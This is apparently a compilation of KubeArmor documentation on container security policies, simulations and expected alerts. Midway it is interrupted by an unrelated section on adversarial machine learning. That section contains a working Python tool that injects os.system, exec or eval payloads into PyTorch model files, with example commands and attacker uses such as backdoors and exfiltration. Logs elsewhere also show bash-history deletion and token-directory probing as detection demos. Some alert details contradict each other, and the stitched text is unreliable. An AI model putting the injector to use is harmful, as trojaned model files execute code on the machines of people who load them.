  "Source": "/usr/bin/rm /root/.bash_history",
  "Timestamp": 1696577978,
  "Type": "MatchedPolicy",
  "UpdatedTime": "2023-10-06T07:39:38.182538Z",
  "cluster_id": "4291",
  "component_name": "kubearmor",
  "instanceGroup": "0",
  "instanceID": "0",
  "tenant_id": "167",
  "workload": "1"
}

ICMP control: Do not allow scanning tools to use ICMP for scanning the network.

Description

The Internet Control Message Protocol (ICMP) allows Internet hosts to notify each other of errors and allows diagnostics and troubleshooting for system administrators. Because ICMP can also be used by a potential adversary to perform reconnaissance against a target network, and due to historical denial-of-service bugs in broken implementations of ICMP, some network administrators block all ICMP traffic as a network hardening measure.

Attack Scenario

Adversaries may use scanning tools that utilize Internet Control Message Protocol (ICMP) to perform reconnaissance against a target network and identify potential loopholes. It's crucial to monitor network traffic and take proactive measures to prevent these attacks from occurring, such as implementing proper firewall rules and network segmentation. Additionally, it's important to stay up-to-date with the latest security patches to prevent known vulnerabilities from being exploited.

Attack Type: Network Flood, DoS (Denial of Service)
Actual Attack: Ping of Death (PoD)

Compliance

  • ICMP Control

Policy

ICMP Control

apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: restrict-scanning-tools
  namespace: default
spec:
  severity: 4
  selector:
    matchLabels:
      app: nginx
  network:
    matchProtocols:
    - protocol: icmp
      fromSource:
      - path: /usr/bin/ping
    - protocol: udp
      fromSource:
      - path: /usr/bin/ping
  action: Allow
  message: Scanning tool has been detected

Simulation

kubectl exec -it nginx-77b4fdf86c-x7sdm -- bash
root@nginx-77b4fdf86c-x7sdm:/# hping3 www.google.com
Unable to resolve 'www.google.com'
root@nginx-77b4fdf86c-x7sdm:/# hping3 127.0.0.1
Warning: Unable to guess the output interface
[get_if_name] socket(AF_INET, SOCK_DGRAM, 0): Permission denied
[main] no such device
root@nginx-77b4fdf86c-x7sdm:/# ping google.com
PING google.com (216.58.200.206) 56(84) bytes of data.
64 bytes from nrt12s12-in-f206.1e100.net (216.58.200.206): icmp_seq=1 ttl=109 time=51.9 ms
64 bytes from nrt12s12-in-f206.1e100.net (216.58.200.206): icmp_seq=2 ttl=109 time=60.1 ms
^C
--- google.com ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1002ms
rtt min/avg/max/mdev = 51.917/56.005/60.094/4.088 ms

Expected Alert

{
  "Action": "Block",
  "ClusterName": "0-trust",
  "ContainerID": "20a6333c6a46e0da32b3062f0ba76e9aed4fc5ef51f5ee8aec5b980963cedea3",
  "ContainerImage": "docker.io/library/nginx:latest@sha256:32da30332506740a2f7c34d5dc70467b7f14ec67d912703568daff790ab3f755",
  "ContainerName": "nginx",
  "Data": "syscall=SYS_SOCKET",
  "Enforcer": "AppArmor",
  "HostName": "aditya",
  "HostPID": 86904,
  "HostPPID": 86860,
  "Labels": "app=nginx",
  "NamespaceName": "default",
  "Operation": "Network",
  "Owner": {
    "Name": "nginx",
    "Namespace": "default",
    "Ref": "Deployment"
  },
  "PID": 1064,
  "PPID": 1058,
  "ParentProcessName": "/usr/bin/bash",
  "PodName": "nginx-77b4fdf86c-x7sdm",
  "PolicyName": "DefaultPosture",
  "ProcessName": "/usr/sbin/hping3",
  "Resource": "domain=AF_INET type=SOCK_DGRAM|SOCK_NONBLOCK|SOCK_CLOEXEC protocol=0",
  "Result": "Permission denied",
  "Source": "/usr/sbin/hping3 www.google.com",
  "Timestamp": 1696593032,
  "Type": "MatchedPolicy",
  "UpdatedTime": "2023-10-06T11:50:32.098937Z",
  "cluster_id": "4291",
  "component_name": "kubearmor",
  "instanceGroup": "0",
  "instanceID": "0",
  "tenant_id": "167",
  "workload": "1"
}

Restrict Capabilities: Do not allow capabilities that can be leveraged by the attacker.

Description

Containers run with a default set of capabilities as assigned by the Container Runtime. Capabilities are parts of the rights generally granted on a Linux system to the root user. In many cases applications running in containers do not require any capabilities to operate, so from the perspective of the principal of least privilege use of capabilities should be minimized.

Attack Scenario

Kubernetes by default connects all the containers running in the same node (even if they belong to different namespaces) down to Layer 2 (Ethernet). Every pod running in the same node is able to communicate with any other pod in the same node (independently of the namespace) at the Ethernet level (Layer 2). This allows a malicious container to perform an ARP spoofing attack against the containers on the same node and capture their traffic.

Attack Type: Reconnaissance, Spoofing
Actual Attack: Recon through P.A.S. Webshell, NBTscan

Compliance

  • CIS Kubernetes

  • Control Id: 5.2.8 - Minimize the admission of containers with the NET_RAW capability

  • Control Id: 5.2.9 - Minimize the admission of containers with capabilities assigned

Policy

Restrict Capabilities

apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: ksp-ubuntu-1-cap-net-raw-block
  namespace: multiubuntu
spec:
  severity: 1
  selector:
    matchLabels:
      container: ubuntu-1
  capabilities:
    matchCapabilities:
    - capability: net_raw
  action: Block

Simulation

root@ubuntu-1-deployment-f987bd4d6-xzcb8:/# tcpdump
tcpdump: eth0: You don't have permission to capture on that device
(socket: Operation not permitted)
root@ubuntu-1-deployment-f987bd4d6-xzcb8:/#    

Expected Alert

{
    "Action":"Block",
    "ClusterName":"k3sn0d3",
    "ContainerID":"aaf2118edcc20b3b04a0fae6164f957993bf3c047fd8cb33bc37ac7d0175e848",
    "ContainerImage":"docker.io/kubearmor/ubuntu-w-utils:0.1@sha256:b4693b003ed1fbf7f5ef2c8b9b3f96fd853c30e1b39549cf98bd772fbd99e260",
    "ContainerName":"ubuntu-1-container",
    "Data":"syscall=SYS_SOCKET",
    "Enforcer":"AppArmor",
    "HashID":"dd12f0f12a75b30d47c5815f93412f51b259b74ac0eccc9781b6843550f694a3",
    "HostName":"worker-node02",
    "HostPID":38077,
    "HostPPID":38065,
    "Labels":"container=ubuntu-1 group=group-1",
    "Message":"",
    "NamespaceName":"multiubuntu",
    "Operation":"Network",
    "Owner":{
        "Name":"ubuntu-1-deployment",
        "Namespace":"multiubuntu",
        "Ref":"Deployment"
    },
    "PID":124,
    "PPID":114,
    "PodName":"ubuntu-1-deployment-f987bd4d6-xzcb8",
    "PolicyName":"ksp-ubuntu-1-cap-net-raw-block",
    "ProcessName":"/usr/sbin/tcpdump",
    "Resource":"domain=AF_PACKET type=SOCK_RAW protocol=768",
    "Result":"Operation not permitted",
    "Severity":"1",
    "Source":"/usr/sbin/tcpdump",
    "Tags":"",
    "Timestamp":1705405378,
    "Type":"MatchedPolicy",
    "UID":0,
    "UpdatedTime":"2024-01-16T11:42:58.662928Z",
    "UpdatedTimeISO":"2024-01-16T11:42:58.662Z",
    "cluster_id":"16402",
    "component_name":"kubearmor",
    "instanceGroup":"0",
    "instanceID":"0",
    "workload":"1"
}

Security Posture

There are two default modes of operation available: block and audit. block mode blocks all operations that are not explicitly allowed by a policy. audit mode generates telemetry events for operations that would otherwise have been blocked.

KubeArmor has four types of resources: Process, File, Network, and Capabilities. The default posture is configurable for each of the resources separately, except Process: process-based operations are treated under the File resource.

Configuring Default Posture

Global Default Posture

Note: By default, KubeArmor sets the global default posture to audit.

The global default posture is configured using options passed to KubeArmor in its configuration file:

defaultFilePosture: block # or audit
defaultNetworkPosture: block # or audit
defaultCapabilitiesPosture: block # or audit

Or using command line flags with the KubeArmor binary

  -defaultFilePosture string
    	configuring default enforcement action in global file context [audit,block] (default "block")
  -defaultNetworkPosture string
    	configuring default enforcement action in global network context [audit,block] (default "block")
  -defaultCapabilitiesPosture string
    	configuring default enforcement action in global capability context [audit,block] (default "block")

Namespace Default Posture

We use namespace annotations to configure the default posture per namespace. The supported annotation keys are kubearmor-file-posture, kubearmor-network-posture, and kubearmor-capabilities-posture, with values block or audit. If a namespace is annotated with a supported key and an invalid value (like kubearmor-file-posture=invalid), KubeArmor will update the value to the global default posture (i.e., kubearmor-file-posture=block).

Example

Let's start KubeArmor with the default network posture configured to audit using the following YAML.

 sudo env KUBEARMOR_CFG=/path/to/kubearmor.yaml ./kubearmor

Contents of kubearmor.yaml

defaultNetworkPosture: audit

Here's a sample policy that allows TCP connections from the curl binary.

apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: ksp-ubuntu-5-net-tcp-allow-curl
  namespace: multiubuntu
spec:
  severity: 8
  selector:
    matchLabels:
      container: ubuntu-5
  network:
    matchProtocols:
    - protocol: tcp
      fromSource:
      - path: /usr/bin/curl
  action: Allow

Inside the ubuntu-5 deployment, if we try to access TCP using curl, it works as expected with no telemetry generated.

root@ubuntu-5-deployment-7778f46c67-hk6k6:/# curl 142.250.193.46
<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>301 Moved</TITLE></HEAD><BODY>
<H1>301 Moved</H1>
The document has moved
<A HREF="http://www.google.com/">here</A>.
</BODY></HTML>

If we try to access UDP using curl, audit telemetry is generated for the UDP access.

root@ubuntu-5-deployment-7778f46c67-hk6k6:/# curl google.com
<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>301 Moved</TITLE></HEAD><BODY>
<H1>301 Moved</H1>
The document has moved
<A HREF="http://www.google.com/">here</A>.
</BODY></HTML>

curl google.com requires UDP for DNS resolution.

The generated alert has Policy Name DefaultPosture and Action Audit:

== Alert / 2022-03-21 12:56:32.999475 ==
Cluster Name: default
Host Name: kubearmor-dev-all
Namespace Name: multiubuntu
Pod Name: ubuntu-5-deployment-7778f46c67-hk6k6
Container ID: 1f92eb4c9d730862174be04f319763a2c1ac2752669807051c42ddc78aa102d1
Container Name: ubuntu-5-container
Policy Name: DefaultPosture
Type: MatchedPolicy
Source: /usr/bin/curl google.com
Operation: Network
Resource: domain=AF_INET6 type=SOCK_DGRAM protocol=0
Data: syscall=SYS_SOCKET
Action: Audit
Result: Passed

Now let's update the default network posture to block for the multiubuntu namespace.

~❯❯❯  kubectl annotate ns multiubuntu kubearmor-network-posture=block
namespace/multiubuntu annotated

Now if we try to access udp using curl, the action is blocked and related alerts are generated.

root@ubuntu-5-deployment-7778f46c67-hk6k6:/# curl google.com
curl: (6) Could not resolve host: google.com

Here curl couldn't resolve google.com due to blocked access to UDP.

This time the generated alert references the matched Allow policy with Result Permission denied, since the UDP access falls outside the allowed TCP rule:

== Alert / 2022-03-21 13:06:27.731918 ==
Cluster Name: default
Host Name: kubearmor-dev-all
Namespace Name: multiubuntu
Pod Name: ubuntu-5-deployment-7778f46c67-hk6k6
Container ID: 1f92eb4c9d730862174be04f319763a2c1ac2752669807051c42ddc78aa102d1
Container Name: ubuntu-5-container
Policy Name: ksp-ubuntu-5-net-tcp-allow
Severity: 8
Type: MatchedPolicy
Source: /usr/bin/curl google.com
Operation: Network
Resource: domain=AF_INET6 type=SOCK_DGRAM protocol=0
Data: syscall=SYS_SOCKET
Action: Allow
Result: Permission denied

Let's try to set the annotation value to something invalid.

~❯❯❯  kubectl annotate ns multiubuntu kubearmor-network-posture=invalid --overwrite
namespace/multiubuntu annotated
~❯❯❯  kubectl describe ns multiubuntu
Name:         multiubuntu
Labels:       kubernetes.io/metadata.name=multiubuntu
Annotations:  kubearmor-network-posture: audit
Status:       Active

We can see that the annotation value was automatically updated to audit, since that was the global mode of operation for network in the KubeArmor configuration.

Control Telemetry/Visibility

KubeArmor currently supports enabling visibility for containers and hosts.

Visibility for hosts is not enabled by default; however, it is enabled by default for containers.

The karmor tool provides access to both using karmor logs.

Available visibility options:

KubeArmor provides visibility on the following behaviors of containers:

  • Process

  • Files

  • Networks

Prerequisites

Example: wordpress-mysql

  • Now we need to deploy some sample policies

kubectl apply -f https://raw.githubusercontent.com/kubearmor/KubeArmor/main/examples/wordpress-mysql/security-policies/ksp-wordpress-block-process.yaml

This sample policy blocks execution of the apt and apt-get commands in wordpress pods with label selector app: wordpress.

Getting Container Visibility

  • Checking default visibility

    • Container visibility is enabled by default. We can check it using kubectl describe and grep kubearmor-visibility

    POD_NAME=$(kubectl get pods -n wordpress-mysql -l app=wordpress -o jsonpath='{.items[0].metadata.name}') && kubectl describe -n wordpress-mysql pod $POD_NAME | grep kubearmor-visibility
    
    kubearmor-visibility: process, file, network, capabilities
    • For pre-existing workloads: enable visibility using kubectl annotate. Currently KubeArmor supports process, file, network, and capabilities:

    kubectl annotate pods <pod-name> -n wordpress-mysql "kubearmor-visibility=process,file,network,capabilities"
  • Open up a terminal, and watch logs using the karmor cli

    karmor logs
  • In another terminal, simulate a policy violation. Try running apt update inside a pod:

    POD_NAME=$(kubectl get pods -n wordpress-mysql -l app=wordpress -o jsonpath='{.items[0].metadata.name}') && kubectl -n wordpress-mysql exec -it $POD_NAME -- bash
    # apt update
  • In the terminal running karmor logs, the policy violation is shown along with container visibility telemetry.

  • The logs can also be generated in JSON format using karmor logs --json

Getting Host Visibility

  • Host visibility is not enabled by default. To enable host visibility, we need to annotate the node using kubectl annotate node:

  kubectl annotate node <node-name> "kubearmor-visibility=process,file,network,capabilities" 
  • To confirm it, use kubectl describe and grep for kubearmor-visibility:

kubectl describe node <node-name> | grep kubearmor-visibility
  • Now we can get general telemetry events in the context of the host using karmor logs. The logs related to host visibility will have Type: HostLog and Operation: File | Process | Network:

karmor logs --logFilter=all
== Log / 2023-01-27 14:41:49.017709 ==
ClusterName: default
HostName: kubearmor-dev2
Type: HostLog
Source: /usr/bin/dockerd
Resource: /usr/bin/runc --version
Operation: Process
Data: syscall=SYS_EXECVE
Result: Passed
HostPID: 193088
HostPPID: 914
PID: 193088
PPID: 914
ParentProcessName: /usr/bin/dockerd
ProcessName: /usr/bin/runc
== Log / 2023-01-27 14:41:49.018951 ==
ClusterName: default
HostName: kubearmor-dev2
Type: HostLog
Source: /usr/bin/runc --version
Resource: /lib/x86_64-linux-gnu/libc.so.6
Operation: File
Data: syscall=SYS_OPENAT fd=-100 flags=O_RDONLY|O_CLOEXEC
Result: Passed
HostPID: 193088
HostPPID: 914
PID: 193088
PPID: 914
ParentProcessName: /usr/bin/dockerd
ProcessName: /usr/bin/runc
== Log / 2023-01-27 14:41:49.018883 ==
ClusterName: default
HostName: kubearmor-dev2
Type: HostLog
Source: /usr/bin/runc --version
Resource: /etc/ld.so.cache
Operation: File
Data: syscall=SYS_OPENAT fd=-100 flags=O_RDONLY|O_CLOEXEC
Result: Passed
HostPID: 193088
HostPPID: 914
PID: 193088
PPID: 914
ParentProcessName: /usr/bin/dockerd
ProcessName: /usr/bin/runc
== Log / 2023-01-27 14:41:49.020905 ==
ClusterName: default
HostName: kubearmor-dev2
Type: HostLog
Source: /var/lib/rancher/k3s/data/2949af7261ce923f6a5091396d266a0e9d9436dcee976fcd548edc324eb277bb/bin/k3s
Resource: /var/lib/rancher/k3s/data/2949af7261ce923f6a5091396d266a0e9d9436dcee976fcd548edc324eb277bb/bin/portmap
Operation: Process
Data: syscall=SYS_EXECVE
Result: Passed
HostPID: 193090
HostPPID: 5627
PID: 193090
PPID: 5627
ParentProcessName: /var/lib/rancher/k3s/data/2949af7261ce923f6a5091396d266a0e9d9436dcee976fcd548edc324eb277bb/bin/k3s
ProcessName: /var/lib/rancher/k3s/data/2949af7261ce923f6a5091396d266a0e9d9436dcee976fcd548edc324eb277bb/bin/portmap
  • The logs can also be generated in JSON format using karmor logs --logFilter=all --json

Updating Namespace Visibility

KubeArmor lets the user select which kinds of events are traced by changing the kubearmor-visibility annotation on the namespace.

  • Checking Namespace visibility

    • Namespace visibility can be checked using kubectl describe.

    kubectl describe ns wordpress-mysql | grep kubearmor-visibility
    
    kubearmor-visibility: process, file, network, capabilities
    • To update the visibility of a namespace: let's update the KubeArmor visibility using kubectl annotate. Currently KubeArmor supports process, file, network, and capabilities. Let's update the visibility for the namespace wordpress-mysql:

     kubectl annotate ns wordpress-mysql kubearmor-visibility=network --overwrite
     "namespace/wordpress-mysql annotated"
    

    Note: To turn off visibility across all aspects, use kubearmor-visibility=none. Note that any policy violations or events that result in non-success returns would still be reported in the logs.

  • Open up a terminal, and watch logs using the karmor cli

    karmor logs --logFilter=all -n wordpress-mysql
    
  • In another terminal, let's exec into the pod and run some process commands. Try ls inside the pod:

      POD_NAME=$(kubectl get pods -n wordpress-mysql -l app=wordpress -o jsonpath='{.items[0].metadata.name}') && kubectl -n wordpress-mysql exec -it $POD_NAME -- bash
    # ls

    Notice that no logs are generated for the above command; only logs with Operation: Network are shown.

    Note: If telemetry is disabled, the user won't get audit events even if there is an audit rule.

    Note: Only the logs are affected by changing the visibility; we still get all the alerts that are generated.

  • Let's simulate a sample policy violation, and see whether we still get alerts or not.

    • Policy violation:

    POD_NAME=$(kubectl get pods -n wordpress-mysql -l app=wordpress -o jsonpath='{.items[0].metadata.name}') && kubectl -n wordpress-mysql exec -it $POD_NAME -- bash
    # apt

    Here, note that the alert with Operation: Process is reported.

Adversarial Attacks on Deep Learning Models

Adversarial attacks exploit vulnerabilities in AI systems by subtly altering input data to mislead the model into incorrect predictions or decisions. These perturbations are often imperceptible to humans but can significantly degrade the system's performance.

Types of Adversarial Attacks

  1. By Model Access:

    • White-box Attacks: Complete knowledge of the model, including architecture and training data.

    • Black-box Attacks: No information about the model; the attacker probes responses to craft inputs.

  2. By Target Objective:

    • Non-targeted Attacks: Push input to any incorrect class.

    • Targeted Attacks: Force input into a specific class.

Attack Phases

  1. Training Phase Attacks:

    • Data Poisoning: Injects malicious data into the training set, altering model behavior.

    • Backdoor Attacks: Embeds triggers in training data that activate specific responses during inference.

  2. Inference Phase Attacks:

    • Model Evasion: Gradually perturbs input to skew predictions (e.g., targeted misclassification).

    • Membership Inference: Exploits model outputs to infer sensitive training data (e.g., credit card numbers).

Observations on Model Robustness

Highly accurate models often exhibit reduced robustness against adversarial perturbations, creating a tradeoff between accuracy and security. For instance, Chen et al. found that better-performing models tend to be more sensitive to adversarial inputs.

Defense Strategies

  1. Pre-analysis: Test models for prompt injection vulnerabilities using techniques like fuzzing.

  2. Input Sanitation (see the sketch after this list):

    • Validation: Enforce strict input rules (e.g., character and data type checks).

    • Filtering: Strip malicious scripts or fragments.

    • Encoding: Convert special characters to safe representations.

  3. Secure Practices for Model Deployment:

    • Restrict model permissions.

    • Regularly update libraries to patch vulnerabilities.

    • Detect injection attempts with specialized tooling.
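
As a minimal sketch of the three input-sanitation steps above in Python (the helper name, regex pattern, and length limit are illustrative assumptions, not a vetted sanitizer):

import html
import re

def sanitize_input(raw: str, max_len: int = 512) -> str:
    # Validation: enforce type and length before anything else.
    if not isinstance(raw, str) or len(raw) > max_len:
        raise ValueError("invalid input")
    # Filtering: strip script-like fragments (illustrative pattern only).
    filtered = re.sub(r"(?is)<script.*?>.*?</script>", "", raw)
    # Encoding: convert special characters to safe representations.
    return html.escape(filtered)

print(sanitize_input("hello <script>alert(1)</script> world"))
# -> hello  world (with any remaining special characters HTML-escaped)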

Case Study: Pickle Injection Vulnerability

Python's pickle module allows serialization and deserialization but lacks security checks. Attackers can exploit this to execute arbitrary code using crafted payloads. The module’s inherent insecurity makes it risky to use with untrusted inputs.

Mitigation:

  • Avoid using pickle with untrusted sources.

  • Use secure serialization libraries like json or protobuf.
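
As a minimal sketch of the safer path (the config payload below is hypothetical): json.loads reconstructs only plain data types such as dicts, lists, strings, and numbers, so unlike pickle there is no deserialization-time code execution hook.

import json

# Hypothetical untrusted input, e.g. a model config fetched over the network.
untrusted = '{"model": "resnet18", "epochs": 3, "lr": 0.001}'

config = json.loads(untrusted)  # pure data reconstruction, no __reduce__ hooks
print(config["epochs"])         # -> 3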

Pickle Code Injection PoC

The Pickle Code Injection Proof of Concept (PoC) demonstrates the security vulnerabilities in Python's pickle module, which can be exploited to execute arbitrary code during deserialization. This method is inherently insecure because it allows execution of arbitrary functions without restrictions or security checks.

Core Code Overview

Custom Pickle Injector:

import os, argparse, pickle, struct, shutil
from pathlib import Path
import torch

class PickleInject:
    def __init__(self, inj_objs, first=True):
        self.inj_objs = inj_objs
        self.first = first

    class _Pickler(pickle._Pickler):
        def __init__(self, file, protocol, inj_objs, first=True):
            super().__init__(file, protocol)
            self.inj_objs = inj_objs
            self.first = first

        def dump(self, obj):
            if self.proto >= 2:
                self.write(pickle.PROTO + struct.pack("<B", self.proto))
            if self.first:
                for inj_obj in self.inj_objs:
                    self.save(inj_obj)
            self.save(obj)
            if not self.first:
                for inj_obj in self.inj_objs:
                    self.save(inj_obj)
            self.write(pickle.STOP)

    def Pickler(self, file, protocol):
        # torch.save calls pickle_module.Pickler(...); forward self.first too.
        return self._Pickler(file, protocol, self.inj_objs, self.first)

    class _PickleInject:
        def __init__(self, args, command=None):
            self.command = command
            self.args = args

        def __reduce__(self):
            return self.command, (self.args,)

    class System(_PickleInject):
        def __init__(self, args):
            super().__init__(args, command=os.system)

    class Exec(_PickleInject):
        def __init__(self, args):
            super().__init__(args, command=exec)

    class Eval(_PickleInject):
        def __init__(self, args):
            super().__init__(args, command=eval)

    class RunPy(_PickleInject):
        def __init__(self, args):
            import runpy
            super().__init__(args, command=runpy._run_code)

        # Fixed indentation: __reduce__ must be a method of RunPy, not a
        # local function inside __init__, or the override is never used.
        def __reduce__(self):
            # runpy._run_code expects (code, run_globals)
            return self.command, (self.args, {})

# Parse Arguments
parser = argparse.ArgumentParser(description="PyTorch Pickle Inject")
parser.add_argument("model", type=Path)
parser.add_argument("command", choices=["system", "exec", "eval", "runpy"])
parser.add_argument("args")
args = parser.parse_args()

# Payload construction
command_args = args.args
if os.path.isfile(command_args):
    with open(command_args, "r") as in_file:
        command_args = in_file.read()

if args.command == "system":
    payload = PickleInject.System(command_args)
elif args.command == "exec":
    payload = PickleInject.Exec(command_args)
elif args.command == "eval":
    payload = PickleInject.Eval(command_args)
elif args.command == "runpy":
    payload = PickleInject.RunPy(command_args)

# Save the injected payload
backup_path = f"{args.model}.bak"
shutil.copyfile(args.model, backup_path)
torch.save(torch.load(args.model), f=args.model, pickle_module=PickleInject([payload]))

Example Exploits

  1. Print Injection:

    python torch_pickle_inject.py model.pth exec "print('hello')"
  2. Install Packages:

    python torch_pickle_inject.py model.pth system "pip install numpy"
  3. Adversarial Command Execution: Upon loading the tampered model:

    python main.py

    Output:

    • Installs the package or executes the payload.

    • Alters model behavior: changes predictions, losses, etc.

Attacker Use Cases

  1. Spreading Malware: The injected code can download and install malware on the target machine, which can then be used to infect other systems in the network or create a botnet.

  2. Backdoor Installation: An attacker can use pickle injection to install a backdoor that allows persistent access to the system, even if the original vulnerability is patched.

  3. Data Exfiltration: An attacker can use pickle injection to read sensitive files or data from the system and send it to a remote server. This can include configuration files, database credentials, or any other sensitive information stored on the machine.

Key Risks

The pickle module is inherently insecure for handling untrusted input due to its ability to execute arbitrary code.


KubeArmor Events

Supported formats

  1. Native JSON format (this document)

  2. KubeArmor CEF Format (coming soon...)

Container Telemetry

Container Telemetry Fields format

Process Log
File Log
Network Log

Container Alerts

Container alerts are generated when there is a policy violation or an audit event raised due to a policy action. For example, a policy might block execution of a process. When the execution is blocked by the KubeArmor enforcer, KubeArmor generates an alert event implying the policy action. In the case of an Audit action, KubeArmor only generates an alert without actually blocking the action.

The primary difference between container alert events and the telemetry events showcased above is that alert events contain additional fields, such as the name of the policy that triggered the alert, and other metadata such as "Tags", "Message", and "Severity" associated with the policy rule.

Container Alerts Fields format

Process Alert
File Alert
Network Alert

Host Alerts

The fields are self-explanatory and carry similar meanings as in the context of container-based events (explained above).

Process Alert
Blocked SETGID

Note that KubeArmor also alerts on events blocked by other system policy enforcement. For example, if an SELinux native rule blocks an action, KubeArmor will report those as DefaultPosture events as well. Following is an example of such an event:

Blocked SETUID

Note that KubeArmor also alerts on events blocked by other system policy enforcement. For example, if an SELinux native rule blocks an action, KubeArmor will report those as DefaultPosture events as well. Following is an example of such an event:

Policy Spec for Containers

Policy Specification

Here is the specification of a security policy.

Note: For system call monitoring, we only support the Audit action, no matter what the value of action is.

Policy Spec Description

Now, we will briefly explain how to define a security policy.

Common

A security policy starts with base information such as apiVersion, kind, and metadata. The apiVersion and kind are the same across all security policies. In the case of metadata, you need to specify the name of the policy and the namespace where you want to apply it.

Severity

The severity part is important: you can specify the severity of a given policy from 1 to 10, and this severity will appear in alerts when policy violations happen.

Tags

The tags part is optional. You can define multiple tags (e.g., WARNING, SENSITIVE, MITRE, STIG, etc.) to categorize security policies.

Message

The message part is optional. You can add an alert message, and then the message will be presented in alert logs.

Selector

MatchLabels

The selector part is relatively straightforward. Similar to other Kubernetes configurations, you can specify (a group of) pods based on labels.

MatchExpressions

Further, within the selector we can use matchExpressions to select or deselect workloads based on labels. Currently, only labels can be matched, so the key should be 'label'. The operator determines whether the policy should apply to the workloads specified in the values field or not.

Operator: In

When the operator is set to In, the policy will be applied only to the workloads that match the labels in the values field.

Operator: NotIn

When the operator is set to NotIn, the policy will be applied to all the workloads except those that match the labels in the values field.

NOTE: Both matchExpressions and matchLabels are ANDed operations.
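
As a minimal sketch of the matchExpressions syntax (the app=nginx label value is illustrative):

selector:
  matchExpressions:
  - key: label
    operator: In
    values:
    - app=nginx

With operator: NotIn instead, the same policy would apply to every workload in the namespace except those labeled app=nginx.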

Process

In each match, there are three options.

  • ownerOnly (static action: allow owner only; otherwise block all)

    If this is enabled, only the owners of the executable(s) defined with matchPaths and matchDirectories will be allowed to execute them.

  • recursive

    If this is enabled, the coverage will extend to the subdirectories of the directory defined with matchDirectories.

  • fromSource

    If a path is specified in fromSource, the executable at that path will be allowed/blocked to execute the executables defined with matchPaths or matchDirectories. For better understanding, let us say that an operator defines a policy like the sketch below. Then, /bin/bash will be the only program allowed (blocked) to execute /bin/sleep. Otherwise, the execution of /bin/sleep will be blocked (allowed).
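
A minimal sketch of such a policy (the policy name, namespace, and selector label are assumed for illustration):

apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: ksp-allow-sleep-from-bash
  namespace: multiubuntu
spec:
  severity: 5
  selector:
    matchLabels:
      container: ubuntu-1
  process:
    matchPaths:
    - path: /bin/sleep
      fromSource:
      - path: /bin/bash
  action: Allow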

File

The file section is quite similar to the process section.

The only difference between 'process' and 'file' is the readOnly option.

  • readOnly (static action: allow to read only; otherwise block all)

    If this is enabled, the read operation will be only allowed, and any other operations (e.g., write) will be blocked.
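
For instance, a minimal sketch that keeps a credentials directory readable while blocking writes (the directory path, policy name, and selector are assumed):

apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: ksp-credentials-readonly
  namespace: multiubuntu
spec:
  severity: 5
  selector:
    matchLabels:
      container: ubuntu-1
  file:
    matchDirectories:
    - dir: /credentials/
      readOnly: true
      recursive: true
  action: Block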

Network

In the case of network, there is currently one match type: matchProtocols. You can define specific protocols among TCP, UDP, and ICMP.
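
A minimal network fragment, mirroring the sample policy shown earlier in this document (the curl path is illustrative):

network:
  matchProtocols:
  - protocol: tcp
    fromSource:
    - path: /usr/bin/curl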

Capabilities
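
The capabilities section uses matchCapabilities. A minimal fragment, mirroring the net_raw example shown earlier in this document:

capabilities:
  matchCapabilities:
  - capability: net_raw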

Syscalls

In the case of syscalls, there are two types of matches: matchSyscalls and matchPaths. matchPaths can be used to target system calls aimed at a specific binary path or anything under a specific directory; additionally, you can slice based on syscalls generated by a binary or a group of binaries in a directory. You can use matchSyscalls as a more general rule to match syscalls from all sources or from specific binaries.

There are a few options in each match.

  • fromSource

    If a path is specified in fromSource, KubeArmor will match only syscalls generated by the defined source. For better understanding, take the sketch shown after this list: only unlink system calls generated by /bin/bash will be matched.

  • recursive

    If this is enabled, the coverage will extend to the subdirectories of the directory.

  • Action

Service Account token: Protect access to k8s service account token

Description

K8s mounts the service account token as part of every pod by default. The service account token is a credential that can be used as a bearer token to access k8s APIs and gain access to other k8s entities. Often, no process in the pod actually uses the service account token, and in such cases the token is an unused asset that can be leveraged by an attacker.

Attack Scenario

It's important to note that attackers often look for ways to gain access to other entities within Kubernetes clusters. One common method is to check for credential accesses, such as service account tokens, in order to perform lateral movements. For instance, in many Kubernetes attacks, once the attacker gains entry into a pod, they may attempt to use a service account token to access other entities.

Attack Type: Credential Access, Command Injection
Actual Attack: Hildegard, BlackT, BlackCat RaaS

Compliance

  • CIS_Kubernetes_Benchmark_v1.27, Control-Id-5.1.6

Policy

Service account token

apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: ksp-wordpress-block-service-account
  namespace: wordpress-mysql
spec:
  severity: 2
  selector:
    matchLabels:
      app: wordpress
  file:
    matchDirectories:
      - dir: /run/secrets/kubernetes.io/serviceaccount/
        recursive: true
  action: Block

Simulation

root@wordpress-7c966b5d85-42jwx:/# cd /run/secrets/kubernetes.io/serviceaccount/ 
root@wordpress-7c966b5d85-42jwx:/run/secrets/kubernetes.io/serviceaccount# ls 
ls: cannot open directory .: Permission denied 
root@wordpress-7c966b5d85-42jwx:/run/secrets/kubernetes.io/serviceaccount# 

Expected Alert

{
  "ATags": null,
  "Action": "Block",
  "ClusterName": "deathiscoming",
  "ContainerID": "bbf968e6a75f0b4412478770911c6dd05d5a83ec97ca38872246e89c31e9d41a",
  "ContainerImage": "docker.io/library/wordpress:4.8-apache@sha256:6216f64ab88fc51d311e38c7f69ca3f9aaba621492b4f1fa93ddf63093768845",
  "ContainerName": "wordpress",
  "Data": "syscall=SYS_OPENAT fd=-100 flags=O_RDONLY|O_NONBLOCK|O_DIRECTORY|O_CLOEXEC",
  "Enforcer": "AppArmor",
  "HashID": "f1c272d8d75bdd91b9c4d1dc74c8d0f222bf4ecd0008c3a22a54706563ec5827",
  "HostName": "aditya",
  "HostPID": 11105,
  "HostPPID": 10997,
  "Labels": "app=wordpress",
  "Message": "",
  "NamespaceName": "wordpress-mysql",
  "Operation": "File",
  "Owner": {
    "Name": "",
    "Namespace": "",
    "Ref": ""
  },
  "PID": 204,
  "PPID": 194,
  "PodName": "wordpress-7c966b5d85-42jwx",
  "PolicyName": "DefaultPosture",
  "ProcessName": "/bin/ls",
  "Resource": "/run/secrets/kubernetes.io/serviceaccount",
  "Result": "Permission denied",
